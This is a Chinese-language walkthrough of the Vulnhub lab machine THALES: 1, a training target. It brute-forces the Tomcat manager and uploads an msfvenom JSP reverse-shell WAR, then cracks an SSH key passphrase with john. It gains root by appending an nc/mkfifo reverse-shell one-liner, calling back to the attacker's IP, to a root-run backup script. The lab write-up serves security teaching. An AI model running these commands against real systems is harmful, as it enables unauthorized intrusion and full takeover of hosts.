Vulnhub 靶場 THALES: 1

前期準備

下載連結：https://www.vulnhub.com/entry/thales-1,749/
kali攻擊機：192.168.147.178
靶機：192.168.147.188

一、資訊收集

1、掃描存活伺服器

arp-scan -l

2、使用nmap進行掃描。

nmap -A -p 1-65535 192.168.147.188

3、訪問8080埠收集資訊。

嘗試登入。

4、使用msf爆破tomcat登入、設定靶機地址進行爆破得到地址。

解得：tomcat:role1

二、漏洞攻擊

1、上傳shell檔案

點選 Server Status 再次輸入使用者名稱密碼。

在 List Applications 頁面發現可以上傳檔案的地方：

上傳一個反彈shell試試,建立反彈shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.147.178 LPORT=80 -f war -o revshell.war

上傳檔案訪問並監聽：


2、收集使用者Tomcat的資訊。
檢視一下是 python2 還是 python3：
是 python3 ，寫入互動式shell：

python3 -c 'import pty;pty.spawn("/bin/bash")'

檢視一下許可權:

之前的密碼不對。
在 /home 目錄下發現了一些資訊。

發現 backup.sh 檔案可以執行系統指令：

還發現.ssh目錄

發現有私鑰，那就可以用 ssh2john.py 生成密碼檔案然後爆破，儲存祕鑰到本地：

用 ssh2john.py 指令碼編譯一下：

/usr/share/john/ssh2john.py id_rsa > crack.txt

爆破：

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

密碼：vodka06
3、切換使用者thales。
檢視一下 /home 目錄下的資訊：

重新看 notes.txt 檔案中的資訊。

去notes.txt 提供目錄檢視backup.sh許可權。可以看出是root執行的，且讀寫執行都可以。

三、提權

在其中新增反彈shell（一些反彈shell可以參考 pentestmonkey 網站上的）：

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.147.178 1235 >/tmp/f" >> backup.sh
 

監聽1235埠。